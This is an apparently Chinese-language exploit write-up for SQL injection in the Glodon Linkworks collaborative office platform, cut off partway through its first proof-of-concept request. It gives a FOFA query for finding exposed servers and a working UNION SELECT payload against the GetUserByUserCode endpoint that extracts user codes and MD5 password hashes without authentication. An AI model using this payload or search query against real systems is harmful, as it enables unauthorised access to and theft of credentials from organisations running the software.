广联达-Linkworks 协同办公管理平台 多处SQL注入漏洞复现

0x01 产品简介

广联达-Linkworks协同办公管理平台是一款围绕工程项目的全生命周期,为客户提供数字化软硬件产品、解决方案的管理系统。

0x02 漏洞概述

广联达-Linkworks协同办公管理平台 GetUserByEmployeeCode、GetUserByUserCode等接口处存在SQL注入漏洞，未经身份认证的攻击者可获取用户名密码等敏感信息。

0x03 复现环境

FOFA：

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现 

PoC-1

GET /Org/service/Service.asmx/GetUserByUserCode?EncryptData=1&userCode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20top%201%20concat(F_CODE,%27:%27,F_PWD_MD5)%20from%20T_ORG_USER),NULL,NULL--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; r